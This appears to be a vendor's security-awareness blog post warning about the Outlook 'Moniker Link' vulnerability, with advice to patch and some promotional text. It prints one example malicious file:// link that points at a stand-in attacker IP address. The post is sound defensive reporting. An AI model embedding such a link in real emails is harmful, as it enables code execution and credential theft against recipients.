A Checkpoint security researcher has discovered a critical vulnerability in Microsoft Outlook that poses an imminent and serious cybersecurity risk to users. This new risk allows threat actors to use a specially crafted malicious email to exploit the Outlook client with a zero-day vulnerability exploit. This exploit is being actively exploited in the wild as of this article and patches are available from Microsoft to fix the issue.
The “Moniker Link” attack allows threat actors to bypass Outlook’s built-in protected-mode safeguards. This approach involves embedding malicious links in emails via the file:// protocol and appending an exclamation mark to URLs that lead to attacker-controlled servers.
For example, an attack URL might be:
<a href=”file:///\192.168.1.1testtest.rtf!moretext”>CLICK ME</a>
The flaw enables attackers to execute arbitrary code on a victim’s system simply by delivering a malicious email. In some cases, the email does not require user interaction to trigger the exploit, simply by opening the email in Preview mode, the attack detonates. Once exploited, attackers can gain unauthorized access, install malware, steal sensitive data, or take control of affected systems!
Organizations and individual users who rely on Microsoft Outlook for email communication are at high risk. The vulnerability can:
Microsoft has released official security patches and users are strongly advised to install them immediately. If you are unable to patch immediately, you can take the following mitigating measures:
This Microsoft Outlook vulnerability is a very serious security threat that requires immediate patching. Organizations unable to immediately patch must implement the temporary protections. Please deploy Microsoft’s security patch as soon as you are able. Taking proactive steps now can help prevent potential cyberattacks and safeguard critical information.
For the latest Microsoft updates on this vulnerability, please view the link below.
Not ready to sign up yet, but want to learn more? Attend our monthly webinar to see a demo of CyberHoot, ask questions, and learn what’s new. Click the Green Box below to Register. You want to, I can feel it!
Discover and share the latest cybersecurity trends, tips and best practices – alongside new threats to watch out for.
Stop tricking employees. Start training them. Take Control of Your Security Awareness Training with a Platform...
Read moreA recent discovery by cybersecurity firm Oligo Security has unveiled a series of critical vulnerabilities in...
Read moreGet sharper eyes on human risks, with the positive approach that beats traditional phish testing.